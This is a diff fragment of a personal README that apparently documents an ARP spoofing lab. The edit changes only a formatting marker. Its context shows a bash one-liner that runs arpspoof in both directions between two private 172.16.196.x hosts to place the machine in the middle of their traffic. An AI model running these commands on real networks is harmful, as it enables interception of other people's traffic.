orskoven/orskov.github.io/README.md

 sudo arp -a
 ```

-🔺In my case it all i one terminal so i will use '&' to allow multiple commands running simulatniously:
+> In my case it all i one terminal so i will use '&' to allow multiple commands running simulatniously:

 ```bash
 sudo arpspoof -i eth0 -t 172.16.196.132 172.16.196.133 & sudo arpspoof -i eth0 -t 172.16.196.133 172.16.196.132 & sudo arp -a